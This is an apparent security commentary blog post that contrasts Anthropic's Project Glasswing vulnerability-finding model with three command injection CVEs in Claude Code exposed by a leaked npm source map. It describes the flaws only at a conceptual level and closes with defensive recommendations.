Security announcements do not usually come with built-in counterpoints, but Anthropic delivered one this week.

On April 7, the company unveiled Project Glasswing, a restricted access program giving vetted partners access to Claude Mythos Preview, a frontier model that has autonomously discovered thousands of previously unknown vulnerabilities in every major operating system and browser. The model found a 17-year-old remote code execution flaw in FreeBSD that grants unauthenticated root access over the network. It found a 27-year-old bug in OpenBSD. Anthropic committed $100 million in usage credits to the program and acknowledged, with unusual candor, that it did not train Mythos to have offensive security capabilities. Those capabilities emerged from general improvements in reasoning and code understanding. The partner list reads like a who’s who of enterprise technology: AWS, Apple, Cisco, CrowdStrike, Google, JPMorgan Chase, Microsoft, NVIDIA, and Palo Alto Networks, all operating under coordinated disclosure agreements.

Six days earlier, a researcher noticed that Claude Code version 2.1.88 had shipped a 59.8 MB source map file as a debugging artifact in its npm package, exposing the full TypeScript source of Anthropic’s CLI product to anyone who downloaded it. That source code contained the patterns that became CVE-2026-35022, CVE-2026-35021, and CVE-2026-35020: three OS command injection vulnerabilities sharing one root cause, all exploitable by anyone who could influence Claude Code’s configuration in a CI/CD environment. The CVSS score on CVE-2026-35022 is 9.8. The chain from leaked source to published exploit took less than two weeks.

Both stories are about the same organization making decisions under the same competitive pressure. Neither is complete without the other, and together they define the central tension that every AI company building agentic developer tooling will face for the next 18 months.

The Source Map Is the Story

The vulnerability details matter, but the discovery path matters more. Source map files exist to help developers debug minified JavaScript by mapping compressed production code back to its readable original. They are a development convenience, not a shipping artifact. When Claude Code version 2.1.88 published its npm package with cli.js.map included, it handed every security researcher on the planet the full TypeScript codebase in one afternoon.

The injection patterns were not subtle. All three CVEs share a single root cause: unsanitized string interpolation into shell-evaluated execution. The affected configuration values (apiKeyHelper, awsAuthRefresh, awsCredentialExport, gcpAuthRefresh) are fields that Claude Code uses to manage authentication credentials in automated environments. An attacker who can influence those configuration values can inject shell metacharacters that execute arbitrary commands with the privileges of the user or CI/CD environment. The three CVEs differ only in their injection point; the underlying failure is identical.

What makes this particularly consequential is the context in which Claude Code runs. Developers and platform teams routinely configure AI coding assistants with privileged credentials: AWS access keys, GCP service accounts, API tokens for internal services. The tool needs those credentials to function. A command injection vulnerability in that context does not merely execute arbitrary code; it converts a code execution bug into a credential exfiltration pipeline with almost no additional attacker effort. The trust developers extend to AI coding assistants, running them in CI/CD with the same permissions they would grant a senior engineer, amplifies the impact of precisely this class of flaw.

Capability Versus Practice

The juxtaposition is not irony for its own sake. It reflects a structural problem in how AI companies allocate security attention.

Anthropic’s Glasswing program demonstrates what happens when a company commits serious resources and deliberate restraint to a security capability problem. The decision to restrict Mythos to vetted partners, to invest $100 million in usage credits, to commit $4 million to open-source security organizations, and to require coordinated disclosure is exactly the kind of responsible deployment that the industry claims to want. The zero-days Mythos found are real, credible, and consequential. A 17-year-old FreeBSD RCE that grants root over NFS from an unauthenticated remote position is the kind of finding that reshapes how the industry thinks about AI-augmented security research.

The Claude Code CVE cluster demonstrates what happens when shipping velocity outpaces the security review cycle. AI companies operate under intense competitive pressure to release agentic tools that run with developer-level privileges. The review processes built for web applications and API services do not map cleanly to CLI tools that execute shell commands based on user-controlled configuration in automated pipelines. The source map leak itself is evidence of the velocity problem: a debugging artifact that should have been stripped before publishing made it into a production npm package, which means the publishing pipeline did not include the checks that would have caught it.

The lesson is not that Anthropic is uniquely careless. Every AI company shipping agentic developer tools is operating under the same set of pressures. The lesson is that the organizations with the best offensive security research capabilities are not automatically producing the most secure software. Finding bugs is a different organizational muscle than not shipping them.

The Broader Pattern

This is not an isolated case study. The same week that the Claude Code CVEs were published, the broader AI infrastructure ecosystem disclosed its own cluster of vulnerabilities across NVIDIA Triton, HuggingFace Transformers, PraisonAI, vLLM, BentoML, Gradio, and Ollama. AI serving frameworks and agent SDKs are a category of software that barely existed three years ago and has received almost no sustained security research attention relative to its deployment footprint. The tooling that runs AI in production is now as target-rich as the applications it serves.

Meanwhile, three separate threat actor groups, North Korean operators behind the Contagious Interview campaign, the GlassWorm cluster targeting IDE extensions, and TeamPCP trojanizing the telnyx PyPI package, all converged on developer environments as their primary attack surface this same week. The attack surface has relocated from the endpoint to the workstation of the person writing the code that runs on the endpoint. AI coding assistants, with their privileged credentials and shell execution capabilities, sit squarely in that contested space.

What Defenders Should Do Now

Organizations running Claude Code or the Claude Agent SDK in automated environments should audit every CI/CD pipeline for injection-susceptible configuration values, particularly apiKeyHelper, awsAuthRefresh, awsCredentialExport, and gcpAuthRefresh. Any pipeline where those values could be influenced by external input should be treated as compromised until verified.

More broadly, the operational recommendation is to treat AI coding assistant tools as credential-holding privileged infrastructure, not productivity utilities. Apply the same access review process you would use for a service account or a deployment key. Restrict execution environments to least-privilege configurations. If the tool does not need shell access, revoke it.

Source maps are a security artifact, not just a debugging convenience. Review npm publishing configurations to confirm that source maps are stripped or excluded from production packages before they reach the registry. The Claude Code leak is unlikely to be the last time a source map exposes an attack surface that the development team did not intend to publish.

The Claude Code CVE cluster is also unlikely to be an isolated case. Any agentic developer tool that executes shell commands based on configuration values is a candidate for the same class of vulnerability, regardless of vendor. The question is not whether other tools have similar flaws. The question is whether anyone has looked.

Anthropic built the most capable security AI the industry has ever seen and shipped a credential exfiltration chain in its own CLI the same week. That is not a contradiction. It is a demonstration that offensive capability and defensive practice operate on different organizational timelines, and that closing the gap between them is the actual hard problem in AI security.

JT
Josh Taylor
Behavioral Cybersecurity Researcher & SOC Leader

Josh Taylor is a behavioral cybersecurity researcher and PhD candidate specializing in adversarial cognition. His research explores the intersection of cognitive science and cyber defense, focusing on how understanding attacker psychology can transform security operations.